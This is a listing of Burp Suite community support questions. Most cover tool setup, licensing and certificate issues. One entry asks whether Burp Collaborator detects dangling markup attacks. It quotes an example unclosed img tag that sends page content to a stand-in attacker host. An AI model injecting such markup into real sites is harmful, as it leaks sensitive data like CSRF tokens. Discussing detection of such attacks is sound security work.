How Do I?
Burp CLI verson
Hello, using burp in command line mode I noticed that while building report, I get results from all the burp runs and all the requests burp ever proxied. Stopping the service and starting it, doesn't restart the amount of results, still gives me increasing number of requests. How do I restart that count? Cheers Agnieszka1 Agent Answer 0 Community AnswerApr 12, 2017 09:18AM UTC
Burp can intercept HTTPS but not display in browser
I have already install burp CA When I surf to HTTP/HTTPS the link showed in HTTP History but in browser it show "connecting..." "waiting for [HTTP/HTTPS]" What should I do?1 Agent Answer 1 Community AnswerApr 10, 2017 02:42PM UTC
angularJS - Client-Side Template Injection
Hello - I'm testing a web app that is using AngularJS v1.3.11. Burp has flagged multiple high risk client-side template injection issues with a confidence of firm. I'm trying to figure out if this is a false positive or something I need to report. Essentially, Burp is flagging that it is possible to inject arbitrary expressions into the client template. An example would be were user...2 Agent Answers 5 Community AnswersApr 05, 2017 09:19PM UTC
Does Burp Collaborator test for "dangling markup" vulnerabilities?
This article on github (https://githubengineering.com/githubs-post-csp-journey/?utm_source=webopsweekly&utm_medium=email ) outlines an attack where an attacker injects an unclosed img tag <img src='https://some-evil-site.com/log_csrf?html= which then includes everything until the matching quote in a request to some-evil-site, potentially sending sensitive data. Question, d...1 Agent Answer 0 Community AnswerApr 03, 2017 10:55PM UTC
Interception turned off upon starting
Hello, I would like to ask you how should I save (and load) a burpsuite project that on start, upon loading from a .burp file, interception will be turned off? Thanks.1 Agent Answer 1 Community AnswerApr 03, 2017 02:16PM UTC
Since iOS 10 can't trust Burp anymore, recommended alternatives?
Since iOS 10 can no longer really "trust" the Burp Suite certificate, does anyone have any alternatives that free? While it shows up as trusted in iPhone, it still marks it as not secure when browsing to a site that uses the trusted burp certificate. I saw someone mention use a wildcard cert, but letsencrypt doesn't support it. Just trying to figure out an alternative to being able ...1 Agent Answer 1 Community AnswerMar 31, 2017 03:57PM UTC
I am not able to activate my burp license after formating my laptop.
My laptop had windows 10 pro burp installed. After formatting I installed windows 10 single language and tried to activate burp but no luck, it says "activation failed no more activation for this license". But burp was activated on this pc Kindly suggest what to do in this case. Is there any way that I can activation burp on my PC? Is my license going to waste?1 Agent Answer 0 Community AnswerMar 31, 2017 05:40AM UTC
Burp shows super tiny window&letters
Hi, When opening Burp on my Dell 5510 it won't maximize and it shows tiny window&letters. What settings should I change to see Burp at normal size and not in miniature. Also, I am not able to install any new updates as it freezing at 100% download. The download will not complete.2 Agent Answers 1 Community AnswerMar 31, 2017 02:31AM UTC
Change part of a URL in a project
Hi, We have extensively done browsing to record as most URLs as possible for a particular website, and tested that version, which resides in: www.mydomain.com/uat/application. Now we've moved the same website to another URL, and we access that through: www.mydomain.com/preprod/application. The website, hyperlinks, pages, and applications are the same, but they are placed in another a...1 Agent Answer 0 Community AnswerMar 28, 2017 06:20PM UTC
Hello, I have corporate license for Burp Suite Professional. Which product do I need to download to activate it? Trial version of Burp Suite professional? Will I be able to activate Pro license on it? Or just download Free edition, and activate license? Thank you.2 Agent Answers 1 Community AnswerMar 28, 2017 10:49AM UTC